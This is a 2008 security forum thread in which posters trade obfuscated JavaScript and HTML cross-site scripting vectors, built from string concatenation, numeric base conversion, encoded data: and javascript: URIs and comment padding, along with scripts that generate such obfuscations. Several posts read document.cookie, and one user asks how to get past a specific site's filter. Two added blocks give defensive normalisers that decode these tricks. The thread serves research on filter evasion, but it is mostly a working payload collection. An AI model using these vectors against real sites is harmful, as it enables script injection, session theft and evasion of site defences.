Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 9 of 16
Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: May 14, 2008 04:59AM

@Doc: indeed!

Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: May 14, 2008 01:47PM

Thx! - glad you two liked the last ones.

eval(['alee','(rt(1(,))'].toString().replace(/.,./g,''))
<edits>
alternative to toString()...
eval((['alee','(rt(1(,))']+'').replace(/.,./g,''))
Simple version...
eval((['ale','rt(1)']+'').replace(/,/,''))
Whack...
top['ev'+'al'](['al','ert','(1)']['toS'+'tring']()['repl'+'ace'](/,/g,''))
</edits>

Nothing overly strange. I just didn't know that arrays could be so helpful with concatenation. When converted to a string apparently it's just a list of comma separated values. I know it's nothing new, just new to me. <edit>For that last one, I find it pretty amazing that functions/methods can be called so readily with their names expressed as strings. So many avenues for obfuscation arise. Also, simply top['ale'+'rt'](1) works too. Any keyword referring to the window object works in place of top (parent, this, self, window, top, frames, etc.). Maybe this is all commonly known, but it was a learning experience for me.</edit>

-Dan



Edited 4 time(s). Last edit at 05/15/2008 11:09PM by DoctorDan.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: May 16, 2008 09:51AM

Cool stuff Dan :D

Hehe check this:-
.0.*?1.:Script(.0.*?1.:'\134u006eame')()

*Note
Requires a payload assigned to "name", the result can be simulated like so:-
name='alert(/Chloe is gorgeous (my daughter)/)'
.0.*?1.:Script(.0.*?1.:'eval(\134u006eame)')()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 05/16/2008 09:56AM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: May 16, 2008 10:20AM

Script(XML()..x.@y?'alert(1)':2.)()

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: May 16, 2008 11:20AM

Script('/'.concat(/\
alert(1)/).concat(/ /))()

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: May 20, 2008 01:17PM

Function.apply(undefined,['s','alert(s)'])(1)
Function.call(undefined,'alert(1)')()

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: June 08, 2008 09:00AM

<object data=//h4k.in>
<object data=javascript:\alert(1)>
<object data=jav&#x61script:\u0061lert(2)>
<object data=data:text/html;charset=utf-8,%3cscript%3ealert(3);%3c/script%3e>
<object data=data:text/html;,%3cscript%3ealert(4);%3c/script%3e>

Not really new but worth documenting here - inspired by ma1's recent post

Re: New XSS vectors/Unusual Javascript
Posted by: sirdarckcat
Date: June 08, 2008 10:19AM

ff3 guys:

javascript:alert(function()1+1);

javascript:[$,_]=(function()[_ for each(_ in ["alert",eval])])(),_($)(123);

javascript:(function($)window[$.next()]($.next())(7911..toString(16)))($ for($ in {eval:1,alert:1})if($))

dude, where's my C syntax?

Anyway.. this pwns everything, and even works on IE:
javascript:window[490837..toString(1<<5)](8680439..toString(30))(580049..toString(30))

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 06/08/2008 10:32AM by sirdarckcat.

Re: New XSS vectors/Unusual Javascript
Posted by: ma1
Date: June 08, 2008 11:46AM

@sirdarckcat:
unusual numeric base conversions are 580049, indeed :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: June 08, 2008 01:06PM

alert(25602..toString(30)+
    ', you '+9236..toString(23,1)+
    ' way '+4.0e0000/2+' much '+192..toString(16.1)+255..toString(16.0)+238..toString(16)+
    ' recently ;)'
)

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 08, 2008 02:15PM

@sdc

Cool stuff :)

We'll call it base SDC

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: June 08, 2008 03:16PM

top[(Number.MAX_VALUE/45268).toString(36).slice(15,19)]
((Number.MAX_VALUE/99808).toString(36).slice(71,76)+'("XSS")')

I kind of really start liking this ;)



Edited 1 time(s). Last edit at 06/08/2008 03:18PM by .mario.

Re: New XSS vectors/Unusual Javascript
Posted by: sirdarckcat
Date: June 09, 2008 01:46AM

A little script for making this easier:

javascript:(function(n){return (l=[i for(i in Array(11).join())].concat([String.fromCharCode(97+1*i) for(i in Array(27).join())]),d=1/(b=l.indexOf(n.split('').sort().pop())+1),r=0,[r+=l.indexOf(t)*(d*=b) for each(t in n.split('.').reverse().pop().split('').reverse())].pop());})("window")+"..toString("+b+")";

I was trying to get it to make:
window.alert
or
document.cookie

but no luck :( IEEE 754 precision limits suck..

Re: New XSS vectors/Unusual Javascript
Posted by: ma1
Date: June 09, 2008 03:07AM

A more compact version:
function bs(n) parseInt(n, n = n.split('').sort().pop().charCodeAt() - 86) + "..toString(" + n + ")"

alert(bs("window"))




Edited 3 time(s). Last edit at 06/09/2008 03:15AM by ma1.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 09, 2008 04:16AM

@sdc @ma1

I've added it to Hackvertor, I hope you don't mind
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=Ly9Bd2Vzb21lISEhCjxAc2lyZGFyY2tjYXRfMD53aW5kb3c8QC9zaXJkYXJja2NhdF8wPg%3D%3D

Re: New XSS vectors/Unusual Javascript
Posted by: sirdarckcat
Date: June 09, 2008 08:26AM

Gareth:

You may want to put this code (or a variation of it since this one just runs on FF3):

function bs(n)((n=String(n).replace(/[^a-zA-Z0-9.-]/g,'-')).match(/^.+-|\..*\./))?[bs(x) for each(x in String(n).match(/-?[^.-]*\.?[^.-]+/g))].join('+'):'('+((n[0]=='.'?0:parseInt((n=n.toLowerCase()).split('.')[0],m=(n.match(/^[^a-z]+$/)?n.match(/[\d]/g).sort().pop()*1+1:n.match(/[a-z]/g).sort().pop().charCodeAt()-86)))+'.'+String((function(n,b){return (l=[i for(i in Array(11).join())].concat([String.fromCharCode(97+1*i) for(i in Array(27).join())]),d=1,r=0,[r+=l.indexOf(t)*(d/=b) for each(t in n.split('.').pop().split(''))].pop());})(String(n+'.').split('.')[1],m)+'.').split('.')[1])*1+').toString('+m+')';

lets see

js> x="Hello.guys-my.name-is.sdc-and.I-love.java-script"
Hello.guys-my.name-is.sdc-and.I-love.java-script
js> bs(x)
(26137359.482444316).toString(35)+(-804.6658285714286).toString(35)+(-550.9814670548197).toString(29)+(-6325.75).toString(24)+(-713710.6044712067).toString(32)+(-690865979).toString(30)
js> eval(bs(x))
hello.guys-my.name-is.sdc-and.i-love.java-script
js>




Edited 1 time(s). Last edit at 06/09/2008 08:32AM by sirdarckcat.
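
As an added example (not code from the thread or from any poster), here is the defender-side counterpart to the base-conversion trick above: sirdarckcat's 490837..toString(32) vector, ma1's bs() helper and the (N).toString(r) output of the FF3 version all hide identifiers in numbers, so a normaliser can rewrite each such call into the string it evaluates to and a log reviewer or signature filter sees eval/alert instead of numbers. All function names and the watch-list below are my own choices.

```javascript
// Added example, not from the thread. Rewrites the numeric-base identifier trick
// (490837..toString(32) -> "eval") back into the string it evaluates to, so a
// filter or a reviewer reading a log sees the identifier instead of a number.
// It is a lexical rewrite for inspection, not a semantics-preserving transform.

// Radix forms seen in the thread: 30, 16.1 (toString truncates), 1<<5, (23,1).
function parseRadix(expr) {
  const m = /^\s*(\d+)(?:\.\d+)?(?:\s*<<\s*(\d+))?\s*(?:,.*)?$/.exec(expr);
  if (!m) return null;
  let radix = parseInt(m[1], 10);
  if (m[2] !== undefined) radix <<= parseInt(m[2], 10);
  return radix >= 2 && radix <= 36 ? radix : null;
}

// Matches N..toString(r), (N).toString(r), (-N.f).toString(r) and N['toString'](r).
const BASE_CALL =
  /(?:\((-?\d+(?:\.\d+)?)\)|(-?\d+(?:\.\d+)?))(?:\.\.?toString|\[['"]toString['"]\])\(([^)]*)\)/g;

function decodeBaseCalls(src) {
  return src.replace(BASE_CALL, (whole, wrapped, bare, radixExpr) => {
    const radix = parseRadix(radixExpr);
    if (radix === null) return whole;            // leave what we cannot evaluate
    const text = Number(wrapped ?? bare).toString(radix);
    return JSON.stringify(text);                 // quoted so the result stays readable JS
  });
}

// Names worth flagging when they appear only after decoding (constructed watch-list).
const WATCH = ["eval", "alert", "Function", "cookie", "document"];
function revealedByDecoding(src) {
  const decoded = decodeBaseCalls(src);
  return WATCH.filter((w) => decoded.includes(w) && !src.includes(w));
}

// Constructed sample: the "works on IE" vector quoted earlier in this thread.
const SAMPLE = 'javascript:window[490837..toString(1<<5)](8680439..toString(30))(580049..toString(30))';
console.log(decodeBaseCalls(SAMPLE));    // javascript:window["eval"]("alert")("leet")
console.log(revealedByDecoding(SAMPLE)); // [ 'eval', 'alert' ]
```

Fractional forms like (26137359.482444316).toString(35) are decoded too, but their digit string depends on the engine's float-to-radix algorithm, so only the integer cases should be relied on for exact matching.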

Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: June 11, 2008 07:48PM

[$='ale'+'rt(1)']|[_=frames['Fun'+'ction']]|_($)()

I want to play with this ridiculous stuff I see above my post as well...
-Dan

EDIT:
@SDC, amazing ideas man. I can't believe eval===self[490837['toString'](32)]



Edited 1 time(s). Last edit at 06/11/2008 08:37PM by DoctorDan.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 17, 2008 06:12PM

Valid JS in FF:-

default xml namespace = alert(1)

More:-

default xml namespace=(e)=eval
default xml namespace=e('alert(1)')




Edited 1 time(s). Last edit at 06/17/2008 06:13PM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: guesty22
Date: July 24, 2008 07:57AM

I'm having a problem. On one site, there's a script that removes all the <script> tags, &, and converts <> into &lt; &gt;. Any ideas how to bypass this?

Yes I know, there can be many ways to bypass it, but nothing works from the forum :/



Edited 1 time(s). Last edit at 07/24/2008 08:02AM by guesty22.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: July 24, 2008 10:52AM

@guesty22

This thread is for new and interesting javascript/xss vectors only, please start a separate thread with your question, thanks.

Try this thread:-
http://sla.ckers.org/forum/read.php?2,16443




Edited 1 time(s). Last edit at 07/24/2008 10:53AM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: July 24, 2008 08:36PM

Oh, the strings! Imagine all the possible versions of this vector, considering the amount of ways to form strings.

blur['con'+'structor']('_','eva'+'l(_)')('a'+'lert(1)')

Re: New XSS vectors/Unusual Javascript
Posted by: thornmaker
Date: July 24, 2008 11:06PM

good one DoctorDan. me thinks it can be turned into a phpids vector

Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: July 26, 2008 01:11PM

I think something like this might have been done already, but I'll post it anyway, just in case:

javascript: number = alert; eval(typeof(1))(1);


and

javascript: x = window;y=document; x.alert(y.cookie);

the x is just for the heck of it, and the y can be useful if you ever need to deal with a filter that replaces document.cookie in any variation (even with comments)

edit:
and just one more 'cause it's so much fun

javascript:b = /alert/.source; a = eval("b");; x = top["win"+"dow"];y=eval("doc_ument".replace("_",""));z = top["ev"+"al"]("y.co"+"okie"); x.alert(z);
this alerts your cookies



Edited 5 time(s). Last edit at 07/26/2008 01:32PM by Kyo.

Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: July 27, 2008 07:07AM

window["alert"](1);
window.window.window.window.window.window.alert(2);
window["window"]["window"]["window"]["alert"](3);
window.top.window.alert(4);
this["window"]["top"]["window"]["alert"](5);
top["alert"](6);
this["alert"](7);
alert("8:"+document["cookie"]);
alert("1"["replace"]('1','9'));


I am starting to like this

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: July 27, 2008 02:34PM

Yeah, addictive, ain't it :)

See how far the rabbit hole goes...

Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: July 27, 2008 05:09PM

it's cool because something["something2"] magically becomes something.something2 in any case. I wonder if there are similar things. Someone should read an open source javascript engine

Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: July 27, 2008 08:33PM

Yeah, a few of the past vectors I posted utilized that syntax. I find it very interesting using it to call methods.

Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: July 27, 2008 09:23PM

javascript:NaN = window;eval(0/0+".alert(1)");
:D

Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: July 28, 2008 09:47PM

Somewhat weird MIME-type guess, then combining URL encoding with entities and Unicode in JS. You can also put newlines between the first colon and the following comma. Once again, I'm not sure how much of this is new, but it does look funky.

<a href="data::,&#x25;3Cscr&#37;69pt>%5Cu0061lert(1)</&#X00025;73cript>">XSS</a>

-Dan

EDIT, only tried it in FF3.



Edited 1 time(s). Last edit at 07/28/2008 09:48PM by DoctorDan.
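
As an added example (not code from the thread or from any poster): the href above stacks HTML entities, percent-encoding and a JS \u escape, the object data= vectors earlier use &#x61 and %3c, and Gareth's '\134u006eame' hides a \u escape behind an octal one. A filter that decodes only once never sees the final form, so the normaliser below decodes all three layers repeatedly until the text stops changing and then checks what surfaced. Function names and the sample are mine.

```javascript
// Added example, not from the thread. Peels the layers used in the href above
// (HTML entities -> percent-encoding -> JS string escapes) until the text stops
// changing, then checks for markup that a single-pass filter would have missed.
const NAMED = { lt: "<", gt: ">", amp: "&", quot: '"', apos: "'" };
const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "\ufffd");

// &#x25; &#X00025; &#37; (semicolon optional, as browsers accept) plus a few named ones.
function decodeEntities(s) {
  return s
    .replace(/&#[xX]0*([0-9a-fA-F]{1,5});?/g, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#0*(\d{1,7});?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&(lt|gt|amp|quot|apos);/gi, (_, n) => NAMED[n.toLowerCase()]);
}

// %3C -> "<"; done by hand so malformed input never throws the way decodeURIComponent does.
function decodePercent(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// \u0061 -> "a", \x61 -> "a", and octal \134 -> "\" (the form used in '\134u006eame').
function decodeJsEscapes(s) {
  return s
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\([0-7]{1,3})/g, (_, o) => String.fromCharCode(parseInt(o, 8)));
}

// Decode to a fixed point (bounded, so a deep nest cannot spin forever) and report
// whether script-bearing markup surfaced. rounds = number of rounds that changed something.
function normalize(input, maxRounds = 8) {
  let s = input, rounds = 0;
  for (; rounds < maxRounds; rounds++) {
    const next = decodeJsEscapes(decodePercent(decodeEntities(s)));
    if (next === s) break;
    s = next;
  }
  const flagged = /<\s*script|javascript\s*:/i.test(s);
  return { decoded: s, rounds, flagged };
}

// Constructed sample: the href value from the post above, as it would arrive in a request log.
const SAMPLE = 'data::,&#x25;3Cscr&#37;69pt>%5Cu0061lert(1)</&#X00025;73cript>';
console.log(normalize(SAMPLE)); // { decoded: 'data::,<script>alert(1)</script>', rounds: 1, flagged: true }
```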

Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: July 29, 2008 05:35AM

edit: wrong thread

edit2: I might as well throw something at you, then

javascript:/**/while /**/(/**/typeof/**/ top/**/[/**/"al"/**/+/**/"ert"/**/]/*[*/(/**/1/**/)/**/)/**/break/**/;//

nothing special, just a bunch of comments and using a while loop



Edited 2 time(s). Last edit at 07/29/2008 12:06PM by Kyo.
